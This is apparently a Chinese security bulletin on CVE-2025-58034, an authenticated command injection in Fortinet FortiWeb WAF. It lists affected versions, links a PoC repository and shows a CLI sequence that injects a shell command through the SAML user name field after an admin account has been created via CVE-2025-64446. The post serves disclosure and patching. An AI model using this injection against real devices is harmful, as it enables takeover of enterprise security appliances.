
0x00 前言
Fortinet FortiWeb是Fortinet公司推出的企业级Web应用防火墙(WAF),专为保护Web应用和API抵御高级威胁设计。
它集成人工智能与机器学习技术,通过双层检测引擎(HMM模型与SVM向量机)精准识别异常流量,可防御OWASP Top 10攻击、SQL 注入、XSS、DDoS及恶意机器人。
其核心功能包括API自动化保护、虚拟补丁集成(兼容Acunetix等第三方扫描工具)及智能流量分析,支持HTTP/2、WebSocket等现代协议。
0x01 漏洞描述
漏洞源于API与CLI接口对输入内容缺乏有效过滤,允许经过身份验证的攻击者通过构造特定的HTTP请求或CLI指令,将恶意命令注入系统中并在底层操作系统上执行。
0x02 CVE编号
CVE-2025-58034
0x03 影响版本
8.0.0 <= FortiWeb <= 8.0.1
7.6.0 <= FortiWeb <= 7.6.5
7.4.0 <= FortiWeb <= 7.4.10
7.2.0 <= FortiWeb <= 7.2.11
7.0.0 <= FortiWeb <= 7.0.110x04 漏洞详情
POC:
https://github.com/lincemorado97/CVE-2025-64446_CVE-2025-58034
使用CVE-2025-64446漏洞创建的管理员帐户成功登录后,攻击者可以通过精心构造的请求或直接通过 FortiWeb CLI 来利用经过身份验证的命令注入漏洞。
config user saml-user
edit "`需要执行的命令`"
set entityID http://foo
set service-path /foo
set enforce-signing disable
set slo-bind post
set slo-path /foo
set sso-bind post
set sso-path /foo
end0x05 参考链接
https://fortiguard.fortinet.com/psirt/FG-IR-25-513/
推荐阅读:
CVE-2025-64446|Fortinet FortiWeb身份验证绕过漏洞(POC)
CVE-2025-55752|Apache Tomcat目录遍历漏洞(POC)
CVE-2025-32463|Linux sudo 本地提权漏洞(POC)
Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持